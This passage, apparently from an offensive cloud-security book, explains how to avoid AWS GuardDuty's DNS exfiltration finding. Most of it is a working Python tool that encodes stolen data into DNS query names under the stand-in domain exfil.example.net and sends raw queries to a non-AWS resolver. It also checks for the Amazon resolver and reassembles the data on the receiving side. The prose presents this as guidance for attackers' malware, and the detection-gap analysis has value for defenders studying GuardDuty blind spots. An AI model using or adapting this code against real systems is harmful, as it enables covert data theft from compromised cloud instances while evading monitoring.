Trojan

Most of the findings in GuardDuty's Trojan category can be avoided simply by never communicating with known-bad IP addresses and domains, which is easy to arrange. One finding, Trojan:EC2/DNSDataExfiltration, is different. It triggers when GuardDuty observes an EC2 instance that appears to be exfiltrating data through DNS queries. The straightforward way to avoid it is not to use DNS as the exfiltration channel from a compromised EC2 instance.

Also, as discussed previously, GuardDuty can only read DNS logs for requests that go through the AWS-provided DNS servers (the VPC resolver that EC2 instances receive by default). If your malware uses an alternate DNS resolver for its DNS exfiltration, GuardDuty's DNS log source never sees the queries and this finding cannot trigger. Note that the queries still leave the instance as UDP or TCP port 53 traffic to a non-AWS address, which VPC Flow Logs record and which security groups or network ACLs may block, so check the outbound rules before relying on this.
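The following is an added example, not code from the book: it shows the two halves of the technique just described, first a check of whether the instance's configured nameserver is the Amazon-provided resolver (the VPC CIDR base address plus two, or the link-local 169.254.169.253), then a minimal DNS exfiltration encoder that builds raw A queries and sends them to a resolver of your choosing rather than through the system stub resolver. The domain exfil.example.net, the VPC CIDR 10.0.0.0/16, the resolv.conf text and the secret are constructed placeholders.

```python
import base64
import ipaddress
import random
import socket
import struct

# The Amazon-provided resolver an EC2 instance gets via DHCP: the fixed link-local
# address, or the VPC CIDR base address plus two. GuardDuty's DNS log source only
# sees queries that reach this resolver.
AWS_LINK_LOCAL_RESOLVER = "169.254.169.253"


def is_amazon_provided_dns(nameserver: str, vpc_cidr: str) -> bool:
    """True if nameserver is the Amazon-provided resolver for the given VPC."""
    net = ipaddress.ip_network(vpc_cidr, strict=False)
    ns = ipaddress.ip_address(nameserver)
    return ns == ipaddress.ip_address(AWS_LINK_LOCAL_RESOLVER) or ns == net.network_address + 2


def nameservers_from_resolv_conf(text: str) -> list:
    """Parse the 'nameserver' lines of an /etc/resolv.conf body."""
    return [ln.split()[1] for ln in text.splitlines()
            if ln.strip().startswith("nameserver") and len(ln.split()) > 1]


def chunk_payload(data: bytes, label_len: int = 60, labels_per_query: int = 3) -> list:
    """Base32-encode data (DNS names are case-insensitive, so base64 is unsafe) and
    split it so each piece fits in labels_per_query labels of at most label_len chars."""
    enc = base64.b32encode(data).decode().rstrip("=").lower()
    per_query = label_len * labels_per_query
    chunks = []
    for i in range(0, len(enc), per_query):
        piece = enc[i:i + per_query]
        chunks.append(".".join(piece[j:j + label_len] for j in range(0, len(piece), label_len)))
    return chunks


def exfil_qnames(data: bytes, domain: str) -> list:
    """Full query names: <seq>.<chunk labels>.<domain>. The sequence label lets the
    attacker-controlled authoritative server reorder queries that arrive out of order."""
    return [f"{i}.{chunk}.{domain}" for i, chunk in enumerate(chunk_payload(data))]


def reassemble(qnames: list, domain: str) -> bytes:
    """Receiver side: strip the domain, sort by sequence label, decode the base32 body."""
    parts = {}
    suffix = "." + domain
    for name in qnames:
        body = name[:-len(suffix)] if name.endswith(suffix) else name
        seq, _, chunk = body.partition(".")
        parts[int(seq)] = chunk.replace(".", "")
    enc = "".join(parts[k] for k in sorted(parts)).upper()
    enc += "=" * (-len(enc) % 8)  # restore the padding stripped by the encoder
    return base64.b32decode(enc)


def build_query(qname: str, txid: int) -> bytes:
    """Raw RFC 1035 A query. Building it by hand means the OS stub resolver, and the
    resolver configured in /etc/resolv.conf, are never involved."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    question = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".") if l)
    return header + question + b"\x00" + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN


def send_exfil(data: bytes, domain: str, resolver_ip: str, timeout: float = 2.0) -> int:
    """Send each query as UDP/53 directly to resolver_ip and return the count sent.
    This has a network side effect and is not exercised by the accompanying test."""
    sent = 0
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for qname in exfil_qnames(data, domain):
            s.sendto(build_query(qname, random.randrange(65536)), (resolver_ip, 53))
            sent += 1
            try:
                s.recvfrom(512)  # the answer (likely NXDOMAIN) is irrelevant; the data already left
            except socket.timeout:
                pass
    return sent


if __name__ == "__main__":
    # Constructed sample inputs for this example.
    resolv_conf = "search ec2.internal\nnameserver 10.0.0.2\n"
    for ns in nameservers_from_resolv_conf(resolv_conf):
        print(ns, "is AmazonProvidedDNS:", is_amazon_provided_dns(ns, "10.0.0.0/16"))
    secret = b"constructed sample: not a real credential"
    names = exfil_qnames(secret, "exfil.example.net")
    print(len(names), "query names, e.g.", names[0])
    print("round trip ok:", reassemble(names, "exfil.example.net") == secret)
    # send_exfil(secret, "exfil.example.net", "8.8.8.8")  # a non-AWS resolver; uncomment to send
```

If the nameserver check reports the Amazon-provided resolver, queries made through normal system calls land in GuardDuty's DNS logs; pointing send_exfil at any other resolver keeps them out of that log source, while still leaving UDP/53 flow records behind.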
